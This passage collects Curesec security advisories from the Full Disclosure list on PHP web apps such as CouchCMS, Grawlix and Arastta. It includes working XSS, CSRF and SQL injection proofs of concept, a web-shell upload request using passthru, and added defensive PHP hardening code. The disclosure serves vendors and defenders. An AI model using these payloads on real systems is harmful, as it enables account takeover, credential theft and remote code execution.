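    if (empty($session['csrf_token']) || !isset($post['csrf_token']) || !is_string($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], $post['csrf_token']);
}

// A state-changing handler (constructed): create a user only on a verified POST.
function handleCreateUser(array &$session, array $post, array &$users): bool
{
    if (!csrfValid($session, $post)) {
        return false; // a page on another origin cannot read the victim's token
    }
    $users[$post['username']] = ['admin' => !empty($post['admin'])];
    return true;
}

// Origin (sent by browsers on cross-site POSTs) or Referer as defence in depth.
function originAllowed(array $headers, string $selfHost): bool
{
    $source = $headers['Origin'] ?? $headers['Referer'] ?? null;
    if ($source === null) {
        return false; // neither header on a POST is treated as untrusted
    }
    return strcasecmp((string) parse_url($source, PHP_URL_HOST), $selfHost) === 0;
}

// Stand-alone demonstration.
$session = [];
$users = [];
echo csrfField($session), "\n";

$forged = ['username' => 'evil', 'admin' => '1']; // cross-site form: carries no token
var_dump(handleCreateUser($session, $forged, $users));  // false
$legit = ['username' => 'alice', 'csrf_token' => csrfToken($session)];
var_dump(handleCreateUser($session, $legit, $users));   // true
var_dump(originAllowed(['Origin' => 'https://attacker.example'], 'intranet.example'));            // false
var_dump(originAllowed(['Referer' => 'https://intranet.example/user.php'], 'intranet.example')); // true
```

For the login form the token is bound to the pre-authentication session, so the session identifier must be regenerated after a successful login; otherwise the token a visitor was issued before logging in would remain valid afterwards.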

5. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of disclosure date
12/19/2015 Vendor sends fix for CSRF for verification
01/13/2016 Confirmed CSRF fix
01/20/2016 Vendor requests more time to fix other issues in same version
01/31/2016 Vendor releases fix
02/01/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Opendocman-134-CSRF-150.html
 


[FD] Atutor 2.2: XSS

2016-02-03 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Atutor 2.2
Fixed in:partly in ATutor 2.2.1-RC1, complete in 2.2.1
Fixed Version Link:  http://www.atutor.ca/atutor/download.php
Vendor Website:  http://www.atutor.ca/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  11/17/2015
Disclosed to public: 02/01/2016
Release mode:Coordinated Release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

Atutor is a learning management system (LMS) written in PHP. In version 2.2, it
is vulnerable to multiple reflected and persistent XSS attacks.

The vulnerabilities can lead to the stealing of cookies, injection of
keyloggers, or the bypassing of CSRF protection. If the victim is an admin, a
successful exploitation can lead to code execution via the theme uploader, and
if the victim is an instructor, this can lead to code execution via a file
upload vulnerability in the same version of Atutor.

3. Details

XSS 1: Reflected XSS - Calendar

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: The calendar_next parameter of the calendar is vulnerable to XSS.
This issue has been fixed in ATutor 2.2.1-RC1.

Proof of Concept:


http://localhost/ATutor/mods/_standard/calendar/getlanguage.php?token=calendar_next

[FD] esoTalk 1.0.0g4: XSS

2015-12-23 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:esoTalk 1.0.0g4
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Contact:  t...@esotalk.org
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  11/17/2015
Disclosed to public: 12/21/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

esoTalk is a light-weight forum software written in PHP. In version 1.0.0g4 and
possibly prior versions, there is a reflected XSS vulnerability in the search
because a given URL is echoed unencoded in multiple places.

Successful exploitation may lead to the injection of JavaScript keyloggers, the
stealing of cookies, or the bypassing of CSRF protection.

3. Proof of Concept


http://localhost/esoTalk-1.0.0g4/conversations/a'">?search=test

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/esoTalk-100g4-XSS-124.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] CouchCMS 1.4.5: Code Execution

2015-12-23 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:CouchCMS 1.4.5
Fixed in:1.4.7
Fixed Version Link:  http://www.couchcms.com/products/
Vendor Website:  http://www.couchcms.com/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  11/17/2015
Disclosed to public: 12/21/2015
Release mode:Coordinated Release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

CVSS

High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C

Description

When uploading a file, the file extension is checked against a blacklist. This
blacklist misses at least the pht extension, which most default Apache
configurations execute. The uploaded file must be a valid image file, but an
attacker can bypass this restriction.

Admin credentials are required to upload files.

An .htaccess file forbids the execution of PHP code in uploaded files, but some
servers are configured not to read .htaccess files, for example for performance
reasons. Apache, for example, ignores .htaccess files by default since version
2.3.9.

3. Proof of Concept


POST 
/CouchCMS-1.4.5/couch/includes/kcfinder/browse.php?type=image&lng=en&act=upload&nonce=1abb096565d868f94f727f600e8c4f61
 HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Type: multipart/form-data; 
boundary=---18851501621445926637695954351
Content-Length: 529

-18851501621445926637695954351
Content-Disposition: form-data; name="upload[]"; filename="imageshell.pht"
Content-Type: application/octet-stream

[base64: 
iVBORw0KGgoNSUhEUgAAACAgCAIAAAD8GO2jCXBIWXMAAA7EAAAOxAGVKw4bYElEQVRIiWNcPD89JF9HRVRbMF0oJF9QT1NUWzFdKTs/PliAgYHBc143k/yPi9t+X9N9qif38ePJv1/vBnyyMDBj2bln/dk9G84yjIJRMApGwSgYBaNgFIyCUTAKhg0AAIGyGwIHeA0MAElFTkSuQmCC]

The shellcode used can be found here:
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

4. Solution

To mitigate this issue please upgrade at least to version 1.4.7:

http://www.couchcms.com/products/

Please note that a newer version might already be available.

5. Report Timeline

11/17/2015 Informed Vendor about Issue
11/18/2015 Vendor sends fixes for confirmation
11/20/2015 Verified fixes
11/24/2015 Vendor releases fix
12/21/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/CouchCMS-145-Code-Execution-125.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Grawlix 1.0.3: CSRF

2015-12-23 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Grawlix 1.0.3
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://www.getgrawlix.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  11/17/2015
Disclosed to public: 12/21/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description

Grawlix is a CMS for publishing comics, which is written in PHP. In version
1.0.3, it does not have CSRF protection, which means that an attacker can
perform actions for a victim, if the victim visits an attacker controlled site
while logged in.

An attacker can for example change the password of an existing admin account,
which may in turn lead to code execution via a different vulnerability in the
admin area.

3. Proof of Concept

Change admin password:



  
http://localhost/grawlix-1.0.3/grawlix-1.0.3/_admin/user.config.php"; method="POST">


4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Grawlix-103-CSRF-128.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] CouchCMS 1.4.5: XSS & Open Redirect

2015-12-23 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:CouchCMS 1.4.5
Fixed in:1.4.7
Fixed Version Link:  http://www.couchcms.com/products/
Vendor Website:  http://www.couchcms.com/
Vulnerability Type:  XSS & Open Redirect
Remote Exploitable:  Yes
Reported to vendor:  11/17/2015
Disclosed to public: 12/21/2015
Release mode:Coordinated Release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

CouchCMS 1.4.5 contains two reflected XSS and one open redirect vulnerability.

Successful exploitation may lead to the injection of JavaScript keyloggers, the
stealing of cookies, or the bypassing of CSRF protection.

3. Details

XSS 1

When displaying a post, the name of any additional GET parameters is echoed
unencoded, leading to XSS.

Proof of Concept:


http://localhost/CouchCMS-1.4.5/blog.php?p=5&foo";>alert(2)bar=1

Code:


function getPaginationString( $page = 1, $totalitems, $limit = 15, $adjacents = 
1, $targetpage = "/", $pagestring = "?page=", $prev_text, $next_text, $simple ){
[...]
$pagination .= "$counter";\
[...]
$pagination .= "$counter";
[...]
$pagination .= "$lpm1";
$pagination .= "$lastpage";
[... (all $targetpage . $pagestring are affected) ...]
}

XSS 2

When displaying comments, the name of any additional GET parameters is echoed
unencoded, leading to XSS.

Proof of Concept:


http://localhost/CouchCMS-1.4.5/couch/?o=comments&foo";>alert(1)bar=1

Code:


/couch/edit-comments.php

 href="">t('all'); ?> | 

 href="&status=0">t('unapproved'); ?>  | 
 href="&status=1">t('approved'); ?>
   (of '.$page_title.')';
}
?>


[...]


 |

t('view'); ?> |

t('edit'); ?> |
t('delete'); ?>


Open Redirect

The filter which checks if a user supplied redirect value leads to external
pages can be bypassed by an attacker.

Proof of Concept (Only works for logged in victims or after login):


http://localhost/CouchCMS-1.4.5/couch/login.php?redirect=//google.com

Code:


/couch/auth/auth.php
function redirect( $dest ){
    global $FUNCS, $DB;

    // sanity checks
    $dest = $FUNCS->sanitize_url( trim($dest) );
    if( !strlen($dest) ){
        $dest = ( $this->user->access_level < K_ACCESS_LEVEL_ADMIN ) ? K_SITE_URL : K_ADMIN_URL . K_ADMIN_PAGE;
    }
    elseif( strpos(strtolower($dest), 'http')===0 ){
        if( strpos($dest, K_SITE_URL)!==0 ){ // we don't allow redirects external to our site
            $dest = K_SITE_URL;
        }
    }

    $DB->commit( 1 );
    header( "Location: ".$dest );
    die();
}
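The check above only examines destinations that start with "http", so a protocol-relative destination such as the //google.com in the proof of concept is never compared against K_SITE_URL and goes straight into the Location header, where the browser resolves it against the current scheme. The following is an added example, not CouchCMS code: the vulnerable comparison next to a validator that accepts only destinations on the site's own origin. K_SITE_URL, the function names and the sample destinations are assumptions; the sanitize_url() call from the original is left out.

```php
<?php
// Added example (not CouchCMS code). K_SITE_URL stands in for the site's
// base URL; the sample destinations at the bottom are constructed.
const K_SITE_URL = 'http://localhost/CouchCMS-1.4.5/';

// The check as the advisory shows it: only destinations that start with
// "http" are compared against the site URL, so "//evil.example" (no scheme)
// is never examined and is returned unchanged.
function redirectTargetVulnerable(string $dest): string
{
    $dest = trim($dest);
    if ($dest === '') {
        return K_SITE_URL;
    }
    if (strpos(strtolower($dest), 'http') === 0 && strpos($dest, K_SITE_URL) !== 0) {
        return K_SITE_URL;
    }
    return $dest;
}

// Hardened check: parse the destination and accept it only when it is an
// absolute URL on our own scheme/host/port or a path below the site root.
// Everything else collapses to the site URL.
function redirectTargetSafe(string $dest): string
{
    $dest = trim($dest);
    if ($dest === '') {
        return K_SITE_URL;
    }
    // Browsers treat backslashes as slashes ("/\evil.example"), so normalise
    // before parsing, and refuse control characters outright.
    $dest = str_replace('\\', '/', $dest);
    if (preg_match('/[\x00-\x1f\x7f]/', $dest)) {
        return K_SITE_URL;
    }
    $parts = parse_url($dest);
    $site = parse_url(K_SITE_URL);
    if ($parts === false) {
        return K_SITE_URL;
    }
    if (isset($parts['scheme']) || isset($parts['host'])) {
        // Absolute or protocol-relative: scheme, host and port must all match.
        if (strcasecmp($parts['scheme'] ?? '', $site['scheme']) !== 0
            || strcasecmp($parts['host'] ?? '', $site['host']) !== 0
            || ($parts['port'] ?? null) !== ($site['port'] ?? null)) {
            return K_SITE_URL;
        }
    } elseif (strpos($dest, '//') === 0) {
        return K_SITE_URL;
    }
    // The path must be rooted and must stay below the site's base path.
    $path = $parts['path'] ?? '';
    if ($path === '' || $path[0] !== '/' || strpos($path, $site['path']) !== 0) {
        return K_SITE_URL;
    }
    return $dest;
}

// Constructed destinations: the proof of concept, two variants, two good ones.
foreach (['//google.com', '/\\google.com', 'http://evil.example/',
          'http://localhost/CouchCMS-1.4.5/couch/', '/CouchCMS-1.4.5/couch/?o=comments'] as $d) {
    printf("%-42s vulnerable: %-42s safe: %s\n", $d,
        redirectTargetVulnerable($d), redirectTargetSafe($d));
}
```

Run from the command line, the first three destinations pass the vulnerable check and are rewritten to the site URL by the safe one; the last two are accepted by both. The safe version fails closed on anything parse_url() cannot handle, which is the right default for a value that ends up in a Location header.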

4. Solution

To mitigate this issue please upgrade at least to version 1.4.7:

http://www.couchcms.com/products/

Please note that a newer version might already be available.

5. Report Timeline

11/17/2015 Informed Vendor about Issue
11/18/2015 Vendor sends fixes for confirmation
11/20/2015 Verified fixes
11/24/2015 Vendor releases fix
12/21/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/CouchCMS-145-XSS-amp-Open-Redirect-126.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Grawlix 1.0.3: XSS

2015-12-23 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Grawlix 1.0.3
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://www.getgrawlix.com/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  11/17/2015
Disclosed to public: 12/21/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

Grawlix is a CMS for publishing comics, which is written in PHP. In version
1.0.3 and possibly prior versions, it contains multiple reflected XSS
vulnerabilities.

Successful exploitation may lead to the injection of JavaScript keyloggers, the
stealing of cookies, or the bypassing of CSRF protection.

3. Details

XSS 1

When searching for a book in the admin area, the keyword parameter is echoed
unencoded inside the value attribute of an input tag, leading to XSS.

Proof of Concept:


http://localhost/grawlix-1.0.3/_admin/book.view.php?keyword="; autofocus 
onfocus="alert(1)

Code:


_admin/book.view.php


XSS 2

The slot.label-set.ajax.php script echoes all GET parameters unencoded, leading
to XSS.

Proof of Concept:


http://localhost/grawlix-1.0.3/_admin/slot.label-set.ajax.php?x=alert(1)

Code:


_admin/slot.label-set.ajax.php
echo '$_GET|';print_r($_GET);echo '|';

XSS 3

The edit_id parameter of the site.nav-edit.ajax.php script is vulnerable to XSS.

Proof of Concept:


http://localhost/grawlix-1.0.3/_admin/site.nav-edit.ajax.php?edit_id=";>alert(1)

Code:


_admin/site.nav-edit.ajax.php
$edit_id = $_GET['edit_id'];
[...]
$modal->value($edit_id);

_admin/lib/GrlxForm.php
$this->value ? $value = ' value="'.$this->value.'"' : null;

XSS 4

When viewing the book overview, the start_sort_order parameter is vulnerable to
XSS.

Proof of Concept:


http://localhost/grawlix-1.0.3/_admin/book.view.php?delete_page_id=1&start_sort_order=";
 onmouseover="alert(1)

Code:


_admin/book.view.php
$delete_link->query("delete_page_id=$val[id]&start_sort_order=$start_sort_order");

XSS 5 (limited)

In two scripts, the page_id value is put into a hidden input element without
encoding quotes. It may be possible to execute JavaScript via a style element
in older browsers.

Proof of Concept:


http://localhost/grawlix-1.0.3/_admin/sttc.xml-edit.php?msg=created&page_id="; 
style="STYLE
http://localhost/grawlix-1.0.3/_admin/book.page-edit.php?page_id="; style="STYLE

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Grawlix-103-XSS-129.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Grawlix 1.0.3: Code Execution

2015-12-23 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Grawlix 1.0.3
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://www.getgrawlix.com/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  11/17/2015
Disclosed to public: 12/21/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

Grawlix is a CMS for publishing comics, which is written in PHP.

When uploading an image icon for a link, neither the file type nor the file
extension are checked, leading to code execution.

It should be noted that admin credentials are required to upload an icon, and
that because of a bug when uploading icons, the upload only works if Grawlix is
installed in the root directory.

3. Proof of Concept



  

  function submitRequest()
  {
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/_admin/site.link-list.php", true);
xhr.setRequestHeader("Accept", 
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; 
boundary=---172718417319970434061213874184");
xhr.withCredentials = true;
var body = "-172718417319970434061213874184\r\n" +
  "Content-Disposition: form-data; name=\"input[title]\"\r\n" +
  "\r\n" +
  "Site name\r\n" +
  "-172718417319970434061213874184\r\n" +
  "Content-Disposition: form-data; name=\"input[url]\"\r\n" +
  "\r\n" +
  "http://google.com\r\n" +
  "-172718417319970434061213874184\r\n" +
  "Content-Disposition: form-data; name=\"icon_file\"; 
filename=\"test.php\"\r\n" +
  "Content-Type: application/x-php\r\n" +
  "\r\n" +
  "\x3c?php \n" +
  "passthru($_GET[\'x\']);\n" +
  "\r\n" +
  "-172718417319970434061213874184\r\n" +
  "Content-Disposition: form-data; name=\"submit\"\r\n" +
  "\r\n" +
  "save\r\n" +
  "-172718417319970434061213874184--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
  aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
  }


  

  


4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Grawlix-103-Code-Execution-127.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Arastta 1.1.5: SQL Injection

2015-12-23 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Arastta 1.1.5
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://arastta.org/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 12/21/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

Arastta is an eCommerce software written in PHP. In version 1.1.5, it is
vulnerable to two SQL injection vulnerabilities, one normal injection when
searching for products via tags, and one blind injection via the language
setting. Both of them require a user with special privileges to trigger.

3. SQL Injection 1

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

There is an SQL Injection when retrieving products.

Currently, only the "filter" variable is vulnerable. Note that the "tag_name"
variable would also be vulnerable to SQL injection if there were no filter
forbidding single quotes in the URL. As defense in depth, it might be a good
idea to sanitize that value here as well.

Note that an account with the right "Catalog -> Filters" is needed to exploit
this issue.

Proof of Concept


POST 
/Arastta/admin/index.php?route=catalog/product/autocomplete&token=3d6cfa8f9f602a4f47e0dfbdb989a469&filter_name=a&tag_name=
 HTTP/1.1

tag_text[][value]=abc') union all select password from gv4_user -- -

Code


/admin/model/catalog/product.php
public function getTags($tag_name, $filter_tags = null) {
    [...]
    $query = $this->db->query("SELECT DISTINCT(tag) FROM `" . DB_PREFIX . "product_description` WHERE `tag` LIKE '%" . $tag_name . "%'" . $filter);

/admin/controller/catalog/product.php
public function autocomplete() {
    [...]
    if (isset($this->request->get['tag_name'])) {

        $this->load->model('catalog/product');

        if (isset($this->request->get['tag_name'])) {
            $tag_name = $this->request->get['tag_name'];
        } else {
            $tag_name = '';
        }

        $filter = null;

        if(isset($this->request->post['tag_text'])) {
            $filter = $this->request->post['tag_text'];
        }

        $results = $this->model_catalog_product->getTags($tag_name, $filter);

        foreach ($results as $result) {
            $json[] = array(
                'tag' => $result,
                'tag_id' => $result
            );
        }
    }

4. SQL Injection 2

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

There is a second-order, timing-based SQL injection when choosing the language
setting.

An admin account with the right "Setting -> Setting" is needed to exploit this
issue.

Alternatively, a user with the right "Localisation -> Languages" can inject a
payload as well. However, a user with the right "Setting -> Setting" is still
needed to choose the malicious language to trigger the payload.

Proof of Concept


Visit the setting page:
http://localhost/Arastta/admin/index.php?route=setting/setting

For the config_language and config_admin_language parameters use:
en' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(5000,ENCODE('MSG','by 5 
seconds')),null) -- -

Visiting any page of the site will then trigger the injected code.

Code


/Arastta/system/library/utility.php
public function getDefaultLanguage(){
    if (!is_object($this->config)) {
        return;
    }

    $store_id = $this->config->get('config_store_id');

    if (Client::isAdmin()){
        $sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_admin_language' AND `store_id` = '" . $store_id . "'";
    } else {
        $sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_language' AND `store_id` = '" . $store_id . "'";
    }
    $query = $this->db->query($sql);
    $code = $query->row['value'];

    $language = $this->db->query("SELECT * FROM " . DB_PREFIX . "language WHERE `code` = '" . $code . "'");

    return $language->row;
}
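Both injections in this advisory come from string concatenation into the query text: '%" . $tag_name . "%' in getTags() and '" . $code . "' in getDefaultLanguage(), where $code was itself read back from the setting table (the second-order case). The following is an added example, not Arastta code: the same two lookups written with bound parameters. An in-memory SQLite database via PDO stands in for MySQL so it runs stand-alone; the table and column names follow the advisory, the gv4_ prefix is the one the proof-of-concept payload names, and all rows are constructed.

```php
<?php
// Added example, not Arastta code. SQLite in memory stands in for MySQL;
// table/column names follow the advisory, prefix and rows are constructed.
const DB_PREFIX = 'gv4_';

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE ' . DB_PREFIX . 'product_description (tag TEXT)');
$db->exec('CREATE TABLE ' . DB_PREFIX . 'setting ("key" TEXT, value TEXT, store_id INTEGER)');
$db->exec('CREATE TABLE ' . DB_PREFIX . 'language (code TEXT, name TEXT)');
$db->exec('INSERT INTO ' . DB_PREFIX . "product_description VALUES ('laptop'), ('laptop bag'), ('100% wool')");
$db->exec('INSERT INTO ' . DB_PREFIX . "language VALUES ('en', 'English'), ('de', 'German')");

// SQL Injection 1: the tag search. The LIKE pattern and every entry of the
// optional exclusion filter are bound parameters, and LIKE metacharacters in
// the user's text are escaped so that "100%" is searched for literally.
function getTags(PDO $db, string $tagName, ?array $filterTags = null): array
{
    $pattern = '%' . str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $tagName) . '%';
    $sql = 'SELECT DISTINCT tag FROM ' . DB_PREFIX . "product_description WHERE tag LIKE ? ESCAPE '!'";
    $params = [$pattern];
    if (!empty($filterTags)) {
        $sql .= ' AND tag NOT IN (' . implode(', ', array_fill(0, count($filterTags), '?')) . ')';
        foreach ($filterTags as $t) {
            $params[] = (string) $t;
        }
    }
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// SQL Injection 2 (second order): the language code is read back from the
// setting table and used in a second query. Bound there as well, a code that
// was stored with a payload is just a string that matches no language row.
function getDefaultLanguage(PDO $db, int $storeId, bool $isAdmin): ?array
{
    $key = $isAdmin ? 'config_admin_language' : 'config_language';
    $stmt = $db->prepare('SELECT value FROM ' . DB_PREFIX . 'setting WHERE "key" = ? AND store_id = ?');
    $stmt->execute([$key, $storeId]);
    $code = $stmt->fetchColumn();
    if ($code === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM ' . DB_PREFIX . 'language WHERE code = ?');
    $stmt->execute([$code]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The advisory's payloads, now handled as data.
print_r(getTags($db, "abc') union all select password from gv4_user -- -"));
print_r(getTags($db, 'laptop', ['laptop bag']));
print_r(getTags($db, '100%'));

$ins = $db->prepare('INSERT INTO ' . DB_PREFIX . 'setting VALUES (?, ?, ?)');
$ins->execute(['config_language',
    "en' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(5000,ENCODE('MSG','by 5 seconds')),null) -- -", 0]);
$ins->execute(['config_admin_language', 'de', 0]);
var_dump(getDefaultLanguage($db, 0, false));
var_dump(getDefaultLanguage($db, 0, true));
```

The union payload returns an empty result set because it is only ever a LIKE pattern; the stored language payload makes the first getDefaultLanguage() call return null, where the original code would have executed it on every request. On MySQL, set PDO::ATTR_EMULATE_PREPARES to false so the server rather than the client library performs the binding.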

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/17/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Arastta-115-SQL-Injection-131.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Arastta 1.1.5: XSS

2015-12-23 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Arastta 1.1.5
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://arastta.org/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 12/21/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

Arastta is an eCommerce software written in PHP. In version 1.1.5, a given URL
is echoed unencoded, leading to XSS. This can be used to inject JavaScript
keyloggers or to bypass CSRF protection. If the victim is an admin with the
right "Tool -> File Manager", this can lead to code execution via the file
manager.

3. Proof of Concept


http://localhost/Arastta/index.php/desktops/pc";>alert(1)?sort=pd.name&order=DESC

4. Code


/catalog/view/theme/default/template/common/header.tpl




5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/17/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Arastta-115-XSS-132.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] PhpSocial v2.0.0304: CSRF

2015-12-23 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:PhpSocial v2.0.0304_2026
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://phpsocial.net
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 12/21/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description

PhpSocial is a social networking software written in PHP. In version v2.0.0304,
it does not have CSRF protection, which means that an attacker can perform
actions for a victim, if the victim visits an attacker controlled site while
logged in.

3. Proof of Concept

Add a new admin:



  
http://localhost/PhpSocial_v2.0.0304_2026/cms_phpsocial/admin/AdminAddViewadmins.php"; method="POST">


4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

